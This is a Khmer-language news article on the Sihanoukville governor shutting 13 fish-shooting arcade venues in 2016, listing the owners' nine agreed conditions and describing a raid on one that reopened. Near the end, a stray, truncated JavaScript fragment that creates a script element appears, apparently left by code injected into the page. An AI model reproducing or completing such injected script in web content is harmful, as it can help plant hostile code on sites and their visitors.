ព្រឹតិ្តការណ៍ថ្មីៗ

អភិបាលក្រុងព្រះសីហនុ៖ “បើខ្ញុំបិទហ្គេមបាញ់ត្រីមិនបាន ខ្ញុំនឹងចុះចេញពីតំណែង” ចាប់ពីស្អែកនេះតទៅក្រុងព្រះសីហនុលែងមានហ្គេមបាញ់ត្រីទៀតហើយ!

2 ឆ្នាំ មុន 0 តូ សុផល

ខេត្តព្រះសីហនុ៖ រយៈ៥ថ្ងៃក្រោយពេលដែល លោកអ៊ី សុខឡេង អភិបាលនៃគណៈអភិបាលក្រុងព្រះសីហនុបានប្រកាស មិនអោយមានហ្គេមបាញ់ត្រីមាននៅក្រុងព្រះសីហនុ ហ្គេមបាញ់ត្រីចំនួន១៣ទីតាំងត្រូវបានបិទ ទាំងស្រុង នាថ្ងៃទី១៣ ខែមករា ២០១៦ (រយៈពេល ៥ខែពេញនេះ មិនមានហ្គេមបាញ់ត្រីនៅក្រុងព្រះសីហនុ ) ។

ប៉ុន្តែ២-៣ថ្ងៃនេះ លោកអ៊ី សុខឡេងបានព័ត៌មានពីប្រជាពលរដ្ឋថាមានគេលួចបើកហ្គេមបាញ់ត្រី១កន្លែង នៅផ្ទះលេខ៦ ភូមិ២ សង្កាត់លេខ២។ ក្រោយពីទទួលបានព័ត៌មាននេះភ្លាមលោកអ៊ី សុខឡេង បានឲ្យ អភិបាលរងក្រុង ទៅពិនិត្យ និងតាមដានដោយសម្ងាត់។ ជាលទ្ធផលពិតជាមានលួចបើកលេងហ្គេមបាញ់ ត្រីដូចការផ្តល់ព័ត៌មានរបស់ប្រជាពលរដ្ឋមែន។ រសៀលថ្ងៃអាទិត្យ ១២ មិថុនា ២០១៦ រដ្ឋបាលក្រុងបានចុះ ទៅបង្ក្រាបទីតាំងហ្គេមបាញ់ត្រីខាងលើដោយធ្វើកំណត់ហេតុបិទទីតាំង និងដកហូតទូហ្គេមបាញ់ត្រី ៤គ្រឿង យកមករក្សាទុកនៅសាលាក្រុង។

គួររលឹកដែរថាកន្លងមក ម្ចាស់ហ្គេមបាញ់ត្រីទាំង១៣ទីតាំង ត្រូវបានរដ្ឋបាលក្រុង អញ្ជើញមកសាលាក្រុង ដើម្បីណែនាំ ផ្សព្វផ្សាយ អប់រំ និងបានឲ្យធ្វើកិច្ចសន្យាជាមួយរដ្ឋបាលក្រុង លើកទី១ដែលមាន ៩ចំណុចដូចខាងក្រោម ៖
1. មិនអនុញ្ញាតឲ្យលេងជាលក្ខណៈល្បែងស៊ីសង់ គឺអាចលេងជាការកំសាន្តប្តូរយករង្វាន់និងសម្ភារៈប្រើ ប្រាស់។
2. ត្រូវមានច្បាប់អនុញ្ញាតឲ្យបើក ។
3. មិនអនុញ្ញាតឲ្យសិស្សពាក់ឯកសណ្ឋានចូលលេង ។
4. មិនអនុញ្ញាតឲ្យក្មេងអាយុក្រោម ១៨ឆ្នាំ ចូលលេង។
5. មិនអនុញ្ញាតឲ្យបើកលើសពីម៉ោង ៧យប់។
6. មិនអនុញ្ញាតឲ្យបើកជិតសាលារៀន ។
7. មិនអនុញ្ញាតឲ្យយកទីតាំងប្រើប្រាស់ និងជួញដូរគ្រឿងញៀន ។
8. ត្រូវសហការជាមួយអាជ្ញាធរដែនដីគ្រប់ថ្នាក់ និងជំនាញ ករណីមានអ្វីមិនប្រក្រតី ។
9. ត្រូវរាយការណ៍មកសមត្ថកិច្ចដើម្បីបង្ក្រាបបទល្មើសខុសច្បាប់។
ប៉ុន្តែក្រោយពីធ្វើកិច្ចសន្យាលើកទី១ ម្ចាស់ទីតាំងហ្គេមបាញ់ត្រីទាំង១៣ទីតាំងមិនអនុវត្តតាមកិច្ចសន្យា លើក ទី១ស្របពេលដែលប្រជាពលរដ្ឋ និងអាណាព្យាបាលនៃសិស្សបានសំណូមពរមកលោកអភិបាលក្រុង ឲ្យ មានវិធានការលើហ្គេមបាញ់ត្រី ។

ទើបថ្ងៃទី ០៨ ខែមករា ឆ្នាំ២០១៦ លោកអ៊ី សុខឡេងបានប្រកាសប្តេជ្ញាបិទហ្គេមបាញ់ត្រីទូទាំងក្រុង ដោយ យកតួនាទីជាដើមទុន “បើខ្ញុំបិទហ្គេមបាញ់ត្រីមិនបាន ខ្ញុំនឹងចុះចេញពីតំណែង” ។ បន្ទាប់មកថ្ងៃទី ១៣ ខែ មករា ឆ្នាំ២០១៦ រដ្ឋបាលក្រុងបានអញ្ជើញម្ចាស់ទីតាំងហ្គេមបាញ់ត្រី ជាលើកទី២ ដើម្បីជម្រាបប្រាប់ពីមូលហេតុបិទ ដោយសារបងប្អូនមិនអនុវត្តតាមកិច្ចសន្យាលើកទី១ និងស្របពេល ទទួលបានសំណូមពរពី ប្រជាពលរដ្ឋ ដូច្នេះរដ្ឋបាលក្រុង ត្រូវតែបិទទាំងស្រុង។
ដើម្បីជាការលើកទឹកចិត្ត រដ្ឋបាលក្រុង បានធ្វើលិខិតថ្លែងអំណរគុណទៅម្ចាស់ទីតាំងហ្គេមបាញ់ត្រីទាំង ១៣ទីតាំង៕

ប្រជាពលរដ្ឋទូទាំងក្រុងព្រះសីហនុ ជាពិសេសអាណាព្យាបាលសិស្សទាំងអស់ គាំទ្រចំណាត់ការនេះ ពេញ ទំហឹងចំពោះការប្តេជ្ញាចិត្ត ហើយបានខិតខំព្យាយាមបិទទីតាំងបាញ់ត្រីទាំងអស់ ចាប់តាំងពីលោកមកកាន់ តំណែងជាអភិបាលក្រុងរហូត ទទួលបានលទ្ធផលជាទីមោទនភាពបំផុត នេះគឺជាជោគជ័យរបស់លោក និងអាជ្ញាធរក្រុងព្រះសីហនុគ្រប់ជាន់ថ្នាក់ហើយវាក៏ជាជោគជ័យរបស់ប្រជាពលរដ្ឋផងដែរ។

image image image image image image image image image imagevar d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ